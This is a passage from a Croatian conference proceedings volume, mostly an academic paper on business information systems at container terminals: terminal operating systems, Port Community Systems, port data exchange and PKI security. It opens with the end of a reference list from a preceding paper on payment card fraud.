(UK), John Pointon (UK), 2009 4. Payment Card Fraud in the European Union, Perspective of Law Enforcement Agencies,

EUROPOL, 2012 5. Credit Card Issuer Fraud Management, Ken Paterson, 2008 6. http://www.antiskimmingeye.com/ 7. www.paragraf.rs 8. www.aikbanka.rs/ 9. www.nbs.rs 10. http://www.antiskimmingeye.com/fraud-statistics.html

95

POSLOVNI INFORMACIJSKI SUSTAVI KONTEJNERSKIH TERMINALA

Matea Naglić, mag.ing.log. doc.dr.sc. Edvard Tijan dr.sc. Saša Aksentijević

1. UVOD

Informacijsko – komunikacijska tehnologija duže je vrijeme najznačajniji indikator razvoja i upravljanja u gotovo svim područjima ljudske djelatnosti. Dobar informacijski sustav neophodan je dio uspješnog poslovnog sustava. S tim u vezi, kako bi poslovni sustav mogao opstati, on mora posjedovati adekvatan informacijski sustav s konkretnim informacijskim aktivnostima. Poslovni informacijski sustav ključni je informacijski sustav za poslovanje svakog poduzeća, a predstavlja središnje mjesto na kojemu se unose, prate, analiziraju i čuvaju podaci o poslovanju svakog poduzeća. Kako bi uspješno mogao obavljati svoje funkcije i ostvariti svoje ciljeve, informacijski sustav predstavlja sintezu pet međusobno povezanih i usklađenih elemenata, a to su: hardware, software, lifeware, orgware i netware.

Informacijske tehnologije na kontejnerskim terminalima osnova su za implementaciju suvremenih logističkih procesa. Informacijske i komunikacijske tehnologije (eng. ICT - Information and Communications Technology) posjeduju veliki potencijal za uporabu u razli- čitim poslovnim aktivnostima na kontejnerskim terminalima. Kao jedna od najvažnijih uloga informacijsko - komunikacijskih tehnologija ističe se mogućnost njihovog povezivanja s drugim subjektima u lučkoj zajednici, stvarajući na taj način elektroničku zajednicu lučkog sustava (eng. Port Community System). Inteligentni transportni sustav može se definirati kao holistička, upravljačka i informacijsko - komunikacijska nadgradnja klasičnog sustava prometa i transporta kojim se postiže znatno poboljšanje performansi, odvijanje prometa, učinkovitiji transport putnika i roba, poboljšanje sigurnosti u prometu, udobnost i zaštita putnika te manje onečišćenje okoliša. Temeljna značajka novog pristupa je primjena suvremenih tehnologija za realizaciju navedenih ciljeva. Sustavi nadzora i zaštite kritične infrastrukture važan su dio opisanog koncepta prometa i transporta. Kontejnerski terminali pripadaju posebno osjetljivom segmentu kritične infrastrukture, uslijed potrebe za zaštitom od neželjenog ponašanja i djelovanja.

Sumirajući navedeno, može se zaključiti da se za unaprjeđenje upravljanja na kontejnerskom terminalu primjenjuju napredne informacijske i komunikacijske tehnolgija kao ključni indikatori za osiguravanje neprekinutog tijeka prijevoznog poduhvata. Predmet istraživanja ovog rada je analiza poslovnih informacijskih sustava koji se primjenjuju na terminalima. Osim toga, ovim se radom nastoji prikazati uloga i značaj tih sustava na poslovanje kontejnerskog terminala. Iz prethodno navedenog predmeta istraživanja proizlazi i svrha ovog rada, a to je utvrditi bitne elemente poslovnih informacijskih sustava kao i kontejnerskih terminal te pritom objasniti utjecaj informacijsko – komunikacijske tehnologije na poboljšanje i razvoj kvalitete poslovanje.

Ovaj rad nastao je kao nastavak istraživanja obavljenog prilikom izrade diplomskog rada Matee Naglić, mag. ing.log., sačinjenog pod mentorstvom doc.dr.sc. Edvarda Tijana na Pomorskom fakultetu u Rijeci.

Poslovni informacijski sustavi kontejnerskh terminala Zbornik radova Matea Naglić; Edvard Tijan; Saša Aksentijević

96

2. TEORIJSKE OSNOVE POSLOVNIH INFORMACIJSKIH SUSTAVA

Svaki sustav uz materiju i energiju sa svojom okolinom razmjenjuje i informacije tj. održava neke informacijske veze. Unutar sustava ulazne informacije se obrađuju u izlazne informacije. U elementarnoj definiciji se pod pojmom informacijskog sustava podrazumijeva onaj dio stvarnoga (realnoga, konkretnog) sustava koji služi transformaciji ulaznih u izlazne informacije. No, u samoj praksi cijeli problem obrade podataka je složeniji. Naime, prije svega informacije treba prikupiti, odnosno zahvatiti iz izvora u kojem nastaju. Zatim ih treba po- hraniti odnosno memorirati u ili na određene prikladne medije kako bi bile raspoložive trajno. Nakon toga slijedi obrada ulaznih informacija koja se može opisati kao primjena aritmetičko – logičkih postupaka kojima se informacije pretvaraju (transformiraju) iz izvornoga u neki drugi željeni oblik. Na kraju, izlazne informacije treba dostaviti korisnicima (konzumentima).22

Nakon svega navedenog može se formulirati i šire određenje pojma informacijskog sustava: „Informacijski je sustav uređeni skup elemenata, odnosno komponenata koje u inte- rakciji obavljaju funkcije prikupljanja obrade, pohranjivanja i diseminacije (izdavanja na korištenje) informacija. Informacijski sustav može se smatrati podsustavom poslovnog sustava.“ Informacijski sustavi u poslovnim sustavima podržavanju i informacijski poslužuju poslovne procese i operacije, poslovno odlučivanje te razvijanje i implementaciju kompetitivnih strategija poslovanja. U tom smislu govori se o poslovnim informacijskim sustavima (engl. Enterprise Information System, EIS).

Temeljni cilj informacijskog sustava je dostaviti informaciji na pravo mjesto, u pravo vrijeme uz minimalne troškove, a njegova osnovna zadaća je prikupljanje, razvrstavanje, obrada, čuvanje, oblikovanje i raspoređivanje informacija na sve razine objektnog sustava, odnosno korisnicima.

Kako bi poslovni sustav opstao, on mora posjedovati adekvatan informacijski sustav sa razrađenim informacijskim aktivnostima.23 Nekada su te aktivnosti obavljali ljudi koristeći različite tehnologije obrade podataka, ali danas je nezamisliv dobar informacijski sustav bez upotrebe suvremene informatičke tehnologije. Riječ je o računalno podržanim informacijskim sustavima. Posredstvom informacijskog sustava poslovni sustav koristi podatke iz raznih izvora, unutarnjih ili vanjskih. Te podatke prikuplja i obrađuje informacijski sustav kako bi iz njih proizveo informacije koje dostavlja onima kojima su potrebne za:24

− Upravljanje poslovnim procesima − Odvijanje poslovnih procesa Razvoj informatičke tehnologije doveo je do neposrednog uključivanja informa-

cijskog sustava u odvijanje poslovnog procesa. Informatizacija čitavog niza poslovnih aktivnosti, koje zapravo tradicionalno obavljaju ljudi, povećava njihovu efikasnost automa- tizacijom ili mijenja postojeći način njihova izvođenja.

Danas se na razini razvijenosti teorije i tehnologije poslovnim informacijskim sustavom smatra sustav koji se sastoji od sljedećih komponenata:25 22 Vlahović, N., Luić, Lj., Jaković, B., Zoraja, J., Gašpar, I., Milanović, Lj., Poslovni informacijski sustavi: priručnik, Sveučilište u Zagrebu, Ekonomski fakultet, Zagreb, 2010. (str. 1.-3.) 23 Garača, Ž: Poslovni informacijski sustavi, Skroza, Split, 2008. (str. 53.-54.) 24 Ibidem 25 Panian Ž., Ćurko, K., Bosilj-Vukšić, V., Čerić, V., Pejić-Bach, M., Požgaj, Ž., Strugar, I., Spremić, M., Varga, M.:Poslovni informacijski sustavi, Element, Zagreb, 2010. (str. 10.)


97

• 1. Materijalno – tehničke komponente • 2. Nematerijalne komponente • 3. Ljudske komponente • 4. Mrežne komponente • 5. Organizacijske komponente. • 6. Podatkovne komponente.

Materijalno – tehničku (sklopovsku) komponentu (eng. Hardver) poslovnih informacijskih sustava čine elektronička računala, ulazni – izlazni uređaji, strojevi i sredstva namje- njena isključivo ili pretežito obradi podataka odnosno informacija. To su zapravo svi fizički, „opipljivi“ ali neživi elementi poslovnog informacijskog sustava.

Nematerijalna komponenta (eng. Software) poslovnih informacijskih sustava predstavlja ukupnost ljudskog znanja ugrađenog u strojeve, opremu i uređaje, koje je samo po sebi predmet obrade ili pak diktira način obrade u sustavu. Nematerijalni elementi su programi, uvježbanost i metode vezane uz organizaciju, upravljanje, obrađivanje i korištenje rezultata obrade. Software je obično pohranjen na memorijskim medijima jer zapravo predstavlja magnetni odnosno elektronski zapis.26

Ljudska komponenta (eng. Lifeware) poslovnih informacijskih sustava čine svi ljudi koji u bilo kojoj funkciji i s bilo kakvom namjerom sudjeluju u radu sustava i koriste rezultate njegova rada. To su zapravo kadrovi odnosno ekipe stručnjaka, analitičara ili progra- mer. Čovjek je osnovna komponenta IS-a jer kao njegov dio čovjek/pojedinac formalizira poslovno okružje u podatke, procedure, algoritme, informacije i znanja te usklađujući primjenu IT-a i programsku podršku, ispunjava poslovne funkcije i zadatke (dostavljanje i čuvanje podatka neophodnih za odlučivanje, održanje procesa te razvoj i neprekidnost poslovanja). 27

Mrežna komponenta (eng. Netware) poslovnog informacijskog sustava tvori komuni- kacijsku infrastrukturu za prijenos podataka na veće ili manje udaljenosti među hardverskim elementima unutar samog sustava ili njegovim vezama s okolinom. Računalne mreže su sustavi povezanih računala. U mrežnom okruženju računala razmjenjuju podatke, dijele vla- stite izvore, omogućavaju komunikaciju, paralelni rad, kreiranje virtualne organizacije itd. Za ostvarenje računalne mreže potrebna je odgovarajuća softverska i hardverska podrška. Pasivni elementi te infrastrukture su razni oblici materijalnih ili nematerijalnih kanala i oni ni na koji način ne preoblikuju podatke dok aktivni elementi (namjenski, specijalizirani i komunikacijski uređaji) preoblikuju podatke prije, za vrijeme ili nakon njihovog prijenosa kako bi sam prijenos tih podataka bio učinkovitiji.

Organizacijska komponenta (eng. Orgware) poslovnog informacijskog sustava predstavlja ukupnost standarda, mjera postupaka i propisa kojima se funkcionalno i vremenski usklađuje rad prethodno navedenih četiriju komponenata kako bi stvorile skladnu cjelinu tj. podrazumijeva organizaciju tehničke opreme informacijskog sustava (hardware), programske opreme informacijskog sustava (software) i izvršitelja poslova u informacijskom sustavu u skladnu cjelinu. Funkcionalno usklađivanje tih komponenata naziva se koordinacijom dok se vremensko usklađivanje tih komponenata naziva sinkronizacijom rada sustava.28

Podatkovna komponenta (eng. Dataware) poslovnog informacijskog sustava su svi sadržaji u informacijskom sustavu kojima se opisuju činjenice iz realnog svijeta i poslovnog 26 Wicker, S. B.: Fundamentals of codes, graphs, and iterative decoding (electronic resource), Kluwer Academic Publishers, Boston, 2003. (str. 90.) 27 www.ss-strukovna-vvlatkovica-zd.skole.hr/upload/ss...zd/.../inf.doc (11.06.2014) 28 Panian Ž., Ćurko, K., Bosilj-Vukšić, op. cit. (str. 15.)


98

sustava na koji se odnose a organizirani i oblikovani tako da budu razumljivi i da se mogu koristiti u poslovanju za donošenje odluka i ostvarivanje ciljeva i zadataka.29

Garancija uspješnosti informacijskog sustava je povezivanje svih ovih navedenih elemenata u kvalitativno podjednaku razinu te njihovo međusobno usklađivanje, a to znači da hardver zapravo ne rješava sam sve probleme već mu u tome pomažu programska rješenja (software). Educirani, osposobljeni i motivirani zaposlenici čine dobru organizaciju koju znaju koristiti i efikasno primjeniti informacijske tehnologije.30

2.1. FUNKCIJA POSLOVNIH INFORMACIJSKIH SUSTAVA

Poslovni informacijski sustav je iznimno kompleksan sustav koji ima niz funkcija. Dvije su osnovne funkcije poslovnih informacijskih sustava:31

− Priprema informacijske podloge za donošenje poslovnih odluka i − Dokumentiranje, odnosno trajno pohranjivanje ranije generiranih informacija. Već su spomenute dvije osnovne funkcije, a onu koja se odnosi na upravljanje poslo-

vnim sustavom moguće je podijeliti u tri posebne funkcije prema razinama zadovoljavanja informacijskih potreba poslovnog sustava a to su:

− Dokumentacijska funkcija − Informacijska funkcija i − Upravljačka funkcija.

Ne radi se o komplementarnim funkcijama već o različitim razinama zadovoljenja osnovne funkcije informacijskog sustava. Potpuno ispunjavanje funkcija nižih razina podrazumijeva svaka viša razina. U različitim periodima razvoja organizacije poslovnih sustava i tehnologije informacijskih sustava dominirale su pojedine funkcije, a potom su evoluirale u više oblike. To sve nije bilo uvjetovano samo informacijskim potrebama poslovnih sustava već i aktualnim tehnološkim mogućnostima.32

Dokumentacijska funkcija osigurava sređivanje poslovnih podataka o proteklim događajima. Potrebno je izrađivati niz izvješća kako za potrebe samog sustava, tako i njegove okoline. Tri osnovne skupine korisnika ovih izvješća su uprava, vlasnici i državni organi. Ova funkcija se ostvaruje u vremenu zastare informacija jer se bavi proteklim događajima te joj to umanjuje upravljačku komponentu. Automatska obrada podataka je oblik računalne podrške informacijskog sustava u kome je ova funkcija bila dominantna. U pravilu je organiziran na skupnoj obradi podataka za protekli vremenski period. Susreće se i danas ali je bio karakte- rističan za početke razvoja informacijskih sustava podržanih računalom.

Informacijska funkcija osigurava potrebne informacije o stanju sustava u realnom vremenu, što predstavlja dobru informacijsku podlogu za potrebe odlučivanja i upravljanja. Veže se uz kategoriju integralnih informacijskih sustava koji su postali mogući pojavom i primjenom naprednijih informatičkih tehnologija kao što su baze podataka, terminali, dalji- nska obrada i slično. Ovaj oblik podrške informacijskog sustava osigurava u potpunosti i njegovu dokumentacijsku funkciju.

Upravljačka funkcija osigurava potpune informacijske podloge za odlučivanje i upravljanje. To su osim podataka o stanju sustava i podaci iz njegove okoline, te informacije o 29 Ibidem 30 Vlahović, N., Luić, Lj., op. cit. (str. 14.) 31 Panian Ž., Ćurko, K., Bosilj-Vukšić, op. cit. (str. 17.) 32 Garača, Ž: Poslovni informacijski sustavi, Skroza, Split, 2008. (str. 61.)


99

predviđanju budućeg ponašanja sustava i njegove okoline. Ovu funkciju podržava oblik upravljačkog informacijskog sustava ili menađžerskog informacijskog sustava (MIS). Upra- vljački informacijski sustav se tretira kao koncept informacijskog sustava kroz koji niz podsustava omogućava zadovoljavanje informacijskih potreba svih razina upravljanja, od operativne do strateške razine, te u potpunosti osigurava sve funkcije informacijskog sustava.33

2.2. ORGANIZACIJSKI POGLED NA POSLOVNE INFORMACIJSKE SUSTAVE

Informacijski sustav je podsustav poslovnog sustava. Ostali podustavi su: izvršni – ima za svrhu izvođenje poslovnih procesa, te upravljački, koji, kako mu sam izraz kaže, upravlja poslovanjem. Tokovi podsustava su različiti: materijalni, energetski, financijski, itd.

Informacijski sustav opskrbljuje izvršni i upravljački podsustav informacijama. Info- rmacijski se pak sustav dijeli na:34

− Sustav za obradu transakcija − Upravljački izvještajni sustav − Sustav za potporu odlučivanju.

Slika 1: Dijelovi i podsustavi informacijskog sustava

Izvor: izradili autori

2.2.1. Transakcijski informacijski sustav

Transakcijski informacijski sustav (engl. Transaction Processing System) pripada operativnoj razini i pruža potporu tekućem odvijanju procesa te uključuje bilježenje i obradu svih transakcija. Sustav pruža potporu tekućem odvijanju posl. procesa, prati sve transakcije roba i novca te povezuje te informacije u cjelovit sustav za praćenje. Opće funkcije transakcijskog informacijskog sustava su:35

− Vođenje evidencije o svakoj transakciji u bazu podataka − Izdavanje odnosno generiranje potrebnih dokumenata potrebnih u poslovanju − Kontroliranje poslovnog procesa − Praćenje rutinskih poslovnih događaja (praćenje i obrada narudžbi, fakturiranje,

praćenje zaliha, obračun zaliha, kadrovska evidencija, i sl.) 33 Ćurko, K., Varga, M., Ekonomski fakultet, Zagreb, Mario Hegedues, INFORART, Zagreb (prezentacija u Power Pointu) 34 www.ss-strukovna-vvlatkovica-zd.skole.hr/upload/ss...zd/.../inf.doc (11.06.2014) 35 Srića, V., Informatika 3 – Informacijski sustavi, Školska knjiga, Zagreb, 2003. (str. 45)


100

2.2.2 Upravljački informacijski sustav

Upravljački informacijski sustav (engl. Information Reporting System ili Management Information System) služi srednjem menadžmentu. On opskrbljuje poslovodstvo djelomično agregiranim i kategoriziranim informacijama iz transakcijskog dijela i sadrži unaprijed definirane izvještaje čiji je cilj svrsishodno praćenje tendencija kretanja unutar samog sustava kako bi se na vrijeme moglo reagirati i u skladu s tim donijela odgovarajuća upravljačka odluka. Cilj sustava je prikazati menadžerima pregled aktivnosti poslovnog procesa, upozoriti na trendove (npr. tjedni ili mjesečni pregledi stanja na zalihama robe, prodaje, troškova, i sl.).

2.2.3. Sustav za potporu odlučivanju

Sustav za potporu odlučivaju (engl. Decision Support System - DSS) je jedan od najsloženijih podsustava svakog poslovnog informacijskog sustava. To je računalni sustav koji podupire proces odlučivanja na način da pomaže menadžeru u identifikaciji, pristupu, analizi i transformaciji informacija, izboru i izvođenju modela potrebnih za rješavanje problema odlučivanja te analizu dobivenih rezultata. On obuhvaća elemente umjetne inteligencije koristeći baze znanja, mehanizme zaključivanja, neuronske mreže i sl., te obrađuje informacije iz različitih izvora (unutarnjih i vanjskih).

Taj sustav služi za potporu odlučivanju u domeni slabo strukturiranih i nestrukturiranih problema, a također se često koriste pri rješavanju strukturiranih, odnosno rutinskih problema. Svaki ovakav sustav mora biti dovoljno jednostavan i prilagođen korisniku kako bi bio pristupačniji, te mora biti fleksibilan kako bi prihvatio promjene u načinu odlučivanja ili zadanom problemu te sukladno tome kvalitetno odgovoriti na tu promjenu. Još neke funkcije koje odlikuju ovaj sustav su objedinjavanje tehnologija obrade podataka i modeliranja te izvršavanje prema modelu korištenjem suvremenih tehnika i postupaka, pristup bazi podataka i bazi modela kroz interaktivno testiranje varijanti, povezivanje procjene korisnika s računa- lnim ocjenama različitih odluka36 i njihovih posljedica. On daje odgovore na upite koji nisu unaprijed definirani.

Slika 2: Dijelovi informacijskog sustava – sustav za potporu odlučivanju

Izvor: izradili autori 36 Čerić, V., Varga, M., Informacijska tehnologija u poslovanju, Element, Zagreb, 2004. (str 60. -62.)


101

Ovaj sustav informacije obrađuje statističkim metodama, metodama operacijskih istraživanja i umjetne inteligencije, te nudi rukovoditeljima pomoć pri odlučivanju pomoću “WHAT IF” analize. Mogućnosti odlučivanja su sljedeće:37

− Strukturirano odlučivanje – poznat postupak odlučivanja, postupak se može “pro- gramirati” (postoje strogo određena pravila za njihovo donošenje)

− Polustrukturirano odlučivanje – koristi se stečeno znanje i iskustvo (npr. Ekspe- rtni sustav)

− Nestrukturirano odlučivanje – odlučuje osoba na temelju relevantnih informacija i alata za analizu podataka (npr. analitička obrada podataka i OLAP alati).

Faze odlučivanja kod nestrukturiranih odluka:

− Identificiranje i formuliranje problema, − Modeliranje problema u sustavu za potporu odlučivanju (naći odg. model, npr.

statistički, model ekspertnog sustava i sl.) i − Izvršiti proračun prema modelu.

3. INFORMACIJSKI SUSTAVI LUKA I TERMINALA

Posljednjih nekoliko desetljeća užurbanog razvoja tehnologije nije zaobišlo niti lučko poslovanje. Osim što su veliki svjetski lučki terminali danas opremljeni strojevima visoke tehnologije, također su opremljeni i najmodernijim informacijskim sustavima i sustavima ele- ktroničkog poslovanja. Jedan od glavnih razloga za uvođenje elektroničkog poslovanja u lučke terminale je koordinacija rada svih lučkih subjekata. Prilikom obavljanja lučke usluge u sustav razmjene informacija moraju biti uključeni brojni subjekti – lučki agenti, špediteri, carina, štivadori, osiguravatelji, meteo služba, piloti, lučka uprava, itd. Ukoliko ti subjekti nisu u mogućnosti koordinirano i skladno funkcionirati i razmjenjivati točne informacije (sa- držajno i vremenski) dolazi do poteškoća pri pružanju lučke usluge. Kako bi se takve pote- škoće izbjegle, u lučko poslovanje integriraju se informacijsko – komunikacijske mreže.

Uvođenje elektroničkih računala na kontejnerskim terminalima za počinje već še- zdesetih godina prošlog stoljeća. Prvi poslovi koje su računala obavljala, bili su obračunski poslovi i evidencija podataka o zaposlenima. Sredinom 70-tih njihova se primjena unapređuje pa, računala obavljaju nadziranje i planiranje slaganja kontejnera. Prednosti uvođenja sustava elektroničke obrade podataka na kontejnerskim terminalima su:38

• 1. Prikupljanje informacija na vrijeme i na vjerodostojan način, • 2. Bolja organizacija prikupljenih podataka, • 3. Mogućnost prijema novih informacija u kratkom vremenu, • 4. Jednostavno razotkrivanje podataka u praktičnom i prihvatljivom obliku, • 5. Obrada i brza usporedba velikog broja podataka, • 6. Mogućnost primjene na manjim terminalima, • 7. Smanjenje količine papirnate dokumentacije i broja službenika u uredima i • 8. Manji broj pogrešaka na dokumentima (koje su česte kod ručne obrade podataka).

37 Čerić, V., Varga, M., Informacijska tehnologija u poslovanju , op. cit. (str. 65.) 38 Dundović, Č.: Lučki terminali; Svučilište u Rijeci, Pomorski fakultet u Rijeci, Rijeka, 2002. (str. 127.)


102

Postoji više informacijsko-komunikacijskih sustava na kontejnerskim terminalima koji se razlikuju se po softverskim rješenjima pojedinih proizvođača no svi imaju istu svrhu. Najva- žniji zadatak informacijsko-komunikacijskih sustava na kontejnerskim terminalima je planiranje prekrcajnih aktivnosti. Operator kontejnerskog terminala kao osoba zadužena za planiranje, koordiniranje i kontrolu svih aktivnosti na kontejnerskom terminalu koristi se nekoliko sustava od kojih je najvažniji TOS-Terminal Operating System - sustav za prekrcajne aktivnosti.

Sustavi su podijeljeni u grupe: 39

• 1. Terminal Operating System (TOS) – sustav za direktno planiranje prekrcajnih operacija na terminalu. Funkcije TOS sustava su praćenje: − Statusa kontejnera: veličina, težina, tip, posebna uputstva, sadržaj kontejnera − Resursa: slobodne operativne površine i površine za slaganje kontejnera,

lokacija opreme − Ograničenja: karakteristike operativne povr šine, potrebna oprema − Procesa: optimalno slaganje kontejnera, priroriteti u prekrcaju.

• 2. Gate System – sustav kontrole i identifikacije kontejnera, propisi za kontejnere, sigurnosne mjere.

• 3. Community System – sustav za povezivanje lučkih subjekata razmjenom informacija i elektroničkih poruka.

• 4. Corporate System (sustav za poslovne funkcije)– analizira ljudske resurse, izrađuje financijska i računovodstvena izvješća za menadžere.

• 5. Engineering – sustav za razvijanje i praćenje tehnoloških inovacija na prekrcajnim sredstvima, dijagnosticiranje kvarova.

• 6. Anciliary System – pomoćni sustav za upravljanje praznim odlagalištima i postajama za popravak kontejnera.

• 7. OCR Handling – sustav manupilacije i praćenja kontejnera temeljen na Optical Character Reading – optičkom sustavu čitanja tagova u svrhu pripreme kontejnera za prekrcaj.

• 8. Equipment control (sustav za kontrolu opreme) prati rad opreme na treminalu, trenutne pozicije npr. dizalica, utvrđuje zahtjeve za prekrcajnim sredstvima te provodi i kontrolu RFID (radiofrekvencijskih) komponenti.

• 9. Equipment PLC’s/SCADA (System Control and Data Acquisition) –- sustav za praćenje i kontrolu opreme, osobito automatski navođenih prekrcajnih vozila putem programabilnog logičkog kontrolera (PLC) te SCADA (System Control and Data Acquisition) sustava za prikupljanje i analizu podataka u stvarnom vremenu.

• 10. Information Technologies-Analysis and Design – sustav za dizajniranje i analizu informacijsko-komunikacijskih tehnologija – zajednički svim sustavima, zadu- žen za analizu svih elemenata hardvera i softvera, djeluje na poboljšanje trenutnih performansi, prati kvarove te analizira učinke primjene određenog softvera.

Svaki od ovih sustava mora biti povezan s adekvatnom bazom podataka. Točni i brzi podaci ključni su za uspješan rad ovih sustava. Jedan od načina stvaranja pouzdane baze podataka je klasifikacija podataka i upravljanje životnim ciklusom informacija. Radi se o 39 Hlača, B., Tijan, E., Agatić, E.: Evolucija informacijsko-komunikacijskih tehnologija na kontejnerskim terminalima;Pomorstvo, 24/1, 2010. (str. 31.-32.)


103

održivoj strategiji pohrane podataka, sa svrhom balansiranja između troškova pohrane i upravljanja podacima i poslovne vrijednosti tih podataka. Klasifikacija podataka je proces koji definira razne karakteristike podataka grupirajući ih u logičke kategorije, kako bi se olakšalo postizanje poslovnih ciljeva. Ispravno ustrojene baze podataka trebale bi služiti kontejnerskim terminalima kao i svim ostalim subjektima lučke zajednice (Port Community System).40

3.1. ULOGA INFORMACIJSKIH TEHNOLOGIJA U PROMJENI LOGISTIKE USLUGA U LUKAMA

Nije moguće povezati logističke elemente i implementirati logistiku usluga u lukama bez primjene informacijskih tehnologija, a sve zbog zahtjeva za brzim protokom i dostu- pnošću podataka u logističkim sustavima, pa tako i u lučkom sustavu. "Aplikacije informacijsko-komunikacijskih tehnologija u lukama ostvaruju spregu svih entiteta prisutnih u lučkom sustavu logističkog lanca – davatelja usluga i potencijalnih korisnika te pridonose razvitku automatizacije lučkog sustava podrazumjevajući usklađenost djelovanja mreže lučkih aktivnosti i njenu integraciju sa okolinom.''41

3.1.1. Uvjeti primjene informacijskih tehnologija u luci

Svaka luka trebala bi raspolagati dovoljnim resursima za organizaciju informacijskog sustava kao sredstva olakšavanja i protočnosti poslovnog djelovanja i toka poslovnih aktivnosti. "Uspostavljeni informacijski sustav i baza podataka pružali bi korisnicima, tj. Subje- ktima lučkog poslovanja pravovremene i točne podatke o svim aktivnostima pružanja lučke usluge. Svaki od korisnika imao bi pristup uz određene sigurnosne mjere (šifra korisnika), u vrijeme u koje to želi i na način da može biti ne samo pretraživač i korisnik podataka već mo- že sudjelovati i u njihovom nadopunjavanju ili izmjeni ako je potrebno. Da bi se mogao organizirati informacijski sustav mora se osigurati osnovne uvjete", a to su:''42

• 1. komunikacijsko-informacijsko središte, • 2. povezivanje preko interneta, • 3. osmišljavanje i povezivanje svih subjekata tzv. «e-port» zajednice, • 4. dobrovoljnost pristupa, • 5. poštivanje poslovnih pravila i odgovornost za točnost i pravovremenost une-

senih podataka

3.1.2. Integralni lučki informacijski sustav (Port Community system)

Port Community System (PCS) - informacijska lučka zajednica, lučko informacijsko okruženje predstavlja subjekte lučkog poslovanja povezane sustavom informacijsko-komunikacijskih tehnologija. ″Glavni je cilj PCS informacijskog sustava da svi subjekti budu obje- dinjeni u sustavu koji će im omogućiti da traženu robu dostave točno onda kada postoji

40 Ibidem 41 Dundović, Č., Kolanović, I., Poletan J., T.: Implementacija informacijsko-komunikacijskih tehnologija u lukama, Pomorstvo, 2005. (str. 120.) 42 Ibidem


104

potražnja za robom, da dostave upravo onu robu koja je tražena i da pri tome minimiziraju troškove″.43 Na slici 3. prikazani su subjekti PCS.

Slika 3: Port Community System

Izvor: Tijan, E., Kos, S., Ogrizović, D.: Disaster Recovery and Business Continuity in Port Community System, Pomorstvo, god.23., br.1., 2009., str. 244.

Arhitektura Port Community System informacijskog sustava (Slika 3.) sastoji se od tri sloja:44

• 1. Hardver sa ugrađenim operacijskim sustavima povezanim sa LAN (Local Area Networks) i WAN (Wide Area Networks) te oprema: printeri, fax i sl.

• 2. Aplikacijski sloj sa bazama podataka • 3. Mrežni sloj kao poveznica

Slika 4: Arhitektura Port Community ICT sustava

Izvor: Tijan, E., Kos, S., Ogrizović, D.: Disaster Recovery and Business Continuity in Port Community Systems, Pomorstvo, god.23., br.1., 2009., str. 245.

3.1.3. Sadržaj podataka u bazi i pristup podacima

Cilj stvaranja baze podataka treba biti jasno definiran, kao i pristup podacima i korisnici podataka. Ne bni imalo smisla formirati bazu podataka koja ne bi imala točno 43 Tijan, E., Kos, S., Ogrizović, D.. Disaster Recovery and Business Continuity in PortCommunity Systems, Pomorstvo, god.23., br.1., 2009. (str. 244.) 44 Ibidem (str. 245.)


105

definirane korisnike te način i mogućnost njihovog pristupa, jer bi došlo do nepravilnog funkcioniranja cijelog sustava. Podaci obuhvaćaju sve aktivnosti broda od dolaska pa do odlaska iz luke, a korisnicima se omogućuje i razmjena podataka vezanih uz aktivnosti kretanja broda, i dokumenata koji se pojavljuju u procesu pružanja lučke usluge. Podaci vezani za kretanje broda i tereta su sljedeći:45

• 1. Najava dolaska broda i uplovljenje broda u luku, • 2. najava prekrcaja tereta u svrhu dodjele potrebnih operativnih prostora, sre-

dstava prekrcaja, potrebnog broja radnika, • 3. najava isplovljenja broda i • 4. posebni zahtjevi za određene vrste tereta (opasni teret).

Među korisnicima podaci se mogu i razmjenjivati, a uključuju naravno aktivnosti kretanja broda i tereta, a poseban naglasak stavlja se na razmjenu dokumenata:46

• 1. Lučka dispozicija, • 2. Narudžba, • 3. Potvrde, • 4. Manifest tereta, • 5. Teretnica, • 6. Faktura, • 7. Certifikati, • 8. Plaćanje, • 9. Instrumenti kontrole, • 10. Certifikati i • 11. Dokumentacija za opasne terete (Deklaracija o opasnom teretu, Uputa o

posebnim mjerama sigurnosti).

Ideja uvođenja elektroničke teretnice sastoji se u sljedećem : korisnici (subjekti) koji međusobno razmjenjuju teretnicu imali bi osobnu šifru (eng. private key) koja bi bila jedi- nstvena kombinacija brojeva i slova za svakog korisnika. Brodari bi imali značajnu ulogu u prosljeđivanju elektroničke teretnice, a obveza čuvanja šifre bila bi na subjektima uključenim u razmjenu. Za veću sigurnost u kreiranje šifre uključuje se treća strana koja će nakon provjere svih dokumenta i suglasnosti stranaka izdati potvrdu i šifru47.

3.2. VAŽNOST INFORMACIJSKE SIGURNOSTI I PRIMJENE ISO STANDARDA

Baze podataka potrebno je osigurati od nedopuštenih i neprimjerenih korištenja od strane subjekata uključenih u sustav ili vanjskih subjekata uvođenjem PKI (eng. Public Key Infrastructure) sustava. Primjena određenog ISO standarda jamči barem u nešto većoj mjeri primjenu standardiziranih pravila i postupaka, što korisnicima informacija daje veću sigurnost i ostavlja na korisnike snažniji dojam. 45 Dundović, Č., Kolanović, I., Poletan J., T., op. cit. (str. 120.) 46 Ibidem 47 Poletan Jugović, T., Perić Hadžić, A., Ogrizović, D.: Importance and Effects of the Electronic Documents Implementation in the Service of Logistics-forwarder Operator, Pomorstvo, god.23., 2009. (str. 234.)


106

3.2.1. PKI (Public Key Infrastructure)

PKI (Public Key Infrastructure), poznat i kao X.509, je sustav koji se temelji na strogoj hijerarhijskoj organizaciji izdavanja korisničkih certifikata. PKI sustav čini kombinacija tehnologije enkripcije i servisa koji organizacijama omogućavaju sigurnu međusobnu komunikaciju i poslovne transakcije. PKI se sastoji od više međusobno povezanih objekata, aplikacija i servisa:48

• 1. Alata za upravljanje i nadgledanje sustava, • 2. CA (Certification Authority) koji se brine za izdavanje i valjanost certifikata, • 3. Distribucije izdanih certifikata (najčešće se koristi LDAP imenički servis), • 4. Distribucije CRL liste (Certification Revocation List), • 5. Korisničkog certifikata i • 6. Korisničkih aplikacija, servera itd., koji koriste PKI autorizaciju.

Slika 5. Dijelovi PKI sustava

Izvor: http://www.carnet.hr (09.06.2014)

